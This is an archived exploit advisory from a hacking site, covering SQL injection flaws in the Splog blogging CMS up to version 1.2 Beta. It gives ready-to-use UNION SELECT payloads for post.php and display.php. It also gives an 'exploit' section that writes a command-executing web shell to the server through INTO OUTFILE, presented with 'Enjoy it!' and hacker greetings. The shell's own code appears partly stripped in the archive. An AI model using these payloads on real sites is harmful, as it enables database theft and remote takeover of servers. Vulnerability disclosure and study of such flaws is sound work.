AOH :: HP Unsorted M :: BT-21147.HTM

MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->



MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->



-----------------------------------------------------------------=0D
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->=0D
-----------------------------------------------------------------=0D
=0D
CMS INFORMATION:=0D
=0D
-->WEB: http://sourceforge.net/projects/splog/=0D 
-->DOWNLOAD: http://sourceforge.net/projects/splog/=0D 
-->DEMO: N/A=0D
-->CATEGORY: CMS / Blogging=0D
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing=0D
		full integration into a website by being designed for use...=0D
-->RELEASED: 2009-06-01=0D
=0D
CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3=0D
-->DORK: N/A=0D
-->CATEGORY: SQL INJECTION=0D
-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)=0D
-->Discovered Bug date: 2009-06-08=0D
-->Reported Bug date: 2009-06-09=0D
-->Fixed bug date: 2009-06-10=0D
-->Info patch (1.3): http://sourceforge.net/projects/splog/=0D 
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
=0D
#########################=0D
////////////////////////=0D
=0D
SQL INJECTION (SQLi):=0D
=0D
////////////////////////=0D
#########################=0D
=0D
=0D
-------------------=0D
PROOF OF CONCEPT:=0D
-------------------=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>=0D
=0D
=0D
=0D
[++] GET var --> 'id'=0D
=0D
[++] File vuln --> 'post.php'=0D
=0D
=0D
~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23=0D 
=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>=0D
=0D
=0D
[++] POST var --> 'pCategory'=0D
=0D
[++] File vuln --> 'display.php'=0D
=0D
=0D
POST http://[HOST]/[PATH]/display.php HTTP/1.1=0D 
Host: [HOST]=0D
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10=0D
Referer: http://[HOST]/[PATH]/display.php=0D 
Content-Type: application/x-www-form-urlencoded=0D
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION=0D
=0D
=0D
[++[Return]++] ~~~~~> user, version or database.=0D
=0D
=0D
----------=0D
EXPLOIT:=0D
----------=0D
=0D
=0D
<<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>>=0D
=0D
=0D
[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'SPLOG</a> <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23=0D =0D [POST]~~~~~>=0D =0D POST http://[HOST]/[PATH]/display.php HTTP/1.1=0D Host: [HOST]=0D User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10=0D Referer: http://[HOST]/[PATH]/display.php=0D Content-Type: application/x-www-form-urlencoded=0D pCategory=-1'+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION=0D =0D =0D [++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php=0D =0D =0D =0D =0D #######################################################################=0D #######################################################################=0D ##*******************************************************************##=0D ## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ... ##=0D ##*******************************************************************##=0D ##-------------------------------------------------------------------##=0D ##*******************************************************************##=0D ## GREETZ TO: SPANISH H4ck3Rs community! ##=0D ##*******************************************************************##=0D #######################################################################=0D #######################################################################

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.